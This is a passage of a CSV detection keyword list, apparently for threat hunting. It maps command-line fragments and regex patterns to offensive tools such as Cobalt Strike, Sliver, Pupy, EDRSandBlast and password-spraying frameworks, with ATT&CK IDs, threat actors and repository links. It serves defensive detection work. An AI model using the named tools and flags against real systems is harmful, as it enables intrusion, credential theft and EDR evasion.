SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","0","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","2403" "* NTLMv1 captured *",".{0,1000}\sNTLMv1\scaptured\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","2404" "* ntlmv1.py*",".{0,1000}\sntlmv1\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2405" "* --nt-offsets *.csv*",".{0,1000}\s\-\-nt\-offsets\s.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponizes a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","2406" "* ntp-info.nse*",".{0,1000}\sntp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2407" "* ntp-monlist.nse*",".{0,1000}\sntp\-monlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2408" "* nuages.formatImplantLastSeen*",".{0,1000}\snuages\.formatImplantLastSeen.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","2409" "* NuagesImplant*",".{0,1000}\sNuagesImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","2410" "* nullinux.py*",".{0,1000}\snullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - 
TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","2411" "* -o /share/payloads/*",".{0,1000}\s\-o\s\/share\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2412" "* -o cowroot*",".{0,1000}\s\-o\scowroot.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","N/A","1","28","25","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z","2413" "* -o ffuf.csv*",".{0,1000}\s\-o\sffuf\.csv.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","2414" "* -o merlin.dll merlin.c *",".{0,1000}\s\-o\smerlin\.dll\smerlin\.c\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","2415" "* -o moonwalk*",".{0,1000}\s\-o\smoonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","2416" "* -o simpleXORencoder*",".{0,1000}\s\-o\ssimpleXORencoder.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - 
T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","2417" "* -o sliver-server*",".{0,1000}\s\-o\ssliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","2418" "* -o sprayed.txt*",".{0,1000}\s\-o\ssprayed\.txt.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","2419" "* -o:badrat.xll *",".{0,1000}\s\-o\:badrat\.xll\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","2420" "* o365_enum_activesync.py*",".{0,1000}\so365_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2421" "* o365_enum_office.py*",".{0,1000}\so365_enum_office\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2422" "* o365_enum_onedrive.py*",".{0,1000}\so365_enum_onedrive\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2423" "* o365_spray_activesync.py*",".{0,1000}\so365_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2424" "* o365_spray_adfs.py*",".{0,1000}\so365_spray_adfs\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2425" "* o365_spray_msol.py*",".{0,1000}\so365_spray_msol\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - 
TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2426" "* o365spray.py*",".{0,1000}\so365spray\.py.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","2427" "* -oA icebreaker-scan*",".{0,1000}\s\-oA\sicebreaker\-scan.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","2428" "* --obfs --amsi-bypass *",".{0,1000}\s\-\-obfs\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2429" "* --obfuscate *",".{0,1000}\s\-\-obfuscate\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","2430" "* Obfuscated-Code.py*",".{0,1000}\sObfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell 
with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","2431" "* obfuscation.exe --help*",".{0,1000}\sobfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2432" "* octopus.py*",".{0,1000}\soctopus\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","2433" "* office2john.py*",".{0,1000}\soffice2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2434" "* OfficePersistence.ps1*",".{0,1000}\sOfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","2435" "* 
oh365userfinder.py*",".{0,1000}\soh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2437" "* -old-bloodhound*",".{0,1000}\s\-old\-bloodhound.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","2438" "* omnispray.py*",".{0,1000}\somnispray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2440" "* omp2-brute.nse*",".{0,1000}\somp2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2441" "* omp2-enum-targets.nse*",".{0,1000}\somp2\-enum\-targets\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2442" "* omron-info.nse*",".{0,1000}\somron\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2443" "* --onefile Checkmate.py*",".{0,1000}\s\-\-onefile\sCheckmate\.py.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","N/A","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","2445" "* --oneliner-nothidden*",".{0,1000}\s\-\-oneliner\-nothidden.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - 
T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2446" "* onesixtyone.c*",".{0,1000}\sonesixtyone\.c.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","2447" "* --only-abuse --dc-host *",".{0,1000}\s\-\-only\-abuse\s\-\-dc\-host\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2448" "* --only-known-exploit-paths*",".{0,1000}\s\-\-only\-known\-exploit\-paths.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","2449" "* openflow-info.nse*",".{0,1000}\sopenflow\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2450" "* openlookup-info.nse*",".{0,1000}\sopenlookup\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2451" "* openvas-otp-brute.nse*",".{0,1000}\sopenvas\-otp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2452" "* openwebnet-discovery.nse*",".{0,1000}\sopenwebnet\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2453" "* options.fake_hostname*",".{0,1000}\soptions\.fake_hostname.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","2454" "* oracle-brute.nse*",".{0,1000}\soracle\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2455" "* oracle-brute-stealth.nse*",".{0,1000}\soracle\-brute\-stealth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2456" "* oracle-enum-users.nse*",".{0,1000}\soracle\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2457" "* oracle-sid-brute.nse*",".{0,1000}\soracle\-sid\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2458" "* oracle-tns-version.nse*",".{0,1000}\soracle\-tns\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
